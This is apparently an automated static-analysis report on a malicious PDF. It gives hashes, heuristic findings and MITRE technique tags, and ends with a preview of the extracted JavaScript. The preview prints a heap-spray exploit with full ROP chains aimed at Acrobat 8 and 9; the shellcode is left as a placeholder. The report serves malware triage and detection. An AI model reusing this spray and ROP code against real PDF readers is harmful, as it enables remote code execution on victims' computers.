Malicious PDF — malware analysis report

Static analysis result for SHA-256 71a6000af9343d08…

MALICIOUS

PDF

5.7 KB Created: 2009-05-05 21:16:20 Authoring application: aaa (via vvvv)
MD5: 64146caed139232abfb8b568038c0156 SHA-1: 92ccf8c5745f6cf171a0074f815177dd8417883b SHA-256: 71a6000af9343d08923f358a32f558c1fa2b8935401d6f9bce7579bff52fb7cb
116 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that is obfuscated and appears to be an exploit. The ML classifier strongly indicates maliciousness. The JavaScript attempts to leverage viewer version specific exploits, likely for code execution. No specific family could be identified, but the techniques suggest a downloader or dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
acroform_b64_00.js
2dcc302789541914f37753c067c2c4ea2237a5b048127e1f3f24d5698bb1be31		 deobfuscated-js PDF AcroForm base64 (raw) at offset 0x5D0 2803 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function repeat(count,what) {var v = "";while (--count >= 0) v += what;return v;}

var ver = app.viewerVersion;
var sc = unescape("SHELLCODE");

function spray_func(sc,nop_slide,count){
	var sz = 1024;
	var spray = repeat(nop_slide,1024*15-(sc.length/2))+sc;
	var FirstEntry = repeat(nop_slide,sz-18);
	var OtherEntry = repeat(nop_slide,sz-11);
	mem=new Array();
	for(i=0;i<count;i++){
		if(i==0){
			mem[i]=FirstEntry+spray;
		}else{
			mem[i] = OtherEntry+spray;
		}
	}
} 

if(ver<8){}
else if(ver<9){
	rop8=unescape("%u17f2%u4a82%u5000%u4a84%u630f%u4a80%u7ec9%u4a81%u203c%u4a82%u57bc%u4a80%u156a%u4a82%u54e0%u4a82%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2038%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2030%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u17f2%u4a82%u5004%u4a84%u630f%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0030%u0000%u597d%u4a80%u7ec9%u4a81%u5004%u4a84%ua649%u4a81%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0020%u0000%u597d%u4a80%u17f2%u4a82%u156a%u4a82%u00a0%u4a82%u7ec9%u4a81%u0034%u0000%u795a%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u000a%u0000%u597d%u4a80%u7ec9%u4a81%u2140%u4a82%u57bc%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u5000%u4a84%u4d4d");
	nop_slide8 = unescape("%u12c4%u4a80");
	spray_func(rop8 + sc,nop_slide8,2000);
	this.pageNum = 2;
}else if(ver<10){
	rop9=unescape("%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u0000%u4a8a%u4d4d");
	nop_slide9 = unescape("%u1064%u4a80");
	spray_func(rop9+sc,nop_slide9,2000);this.pageNum = 3;
}

Open this report in the interactive analyzer, or submit your own file for analysis.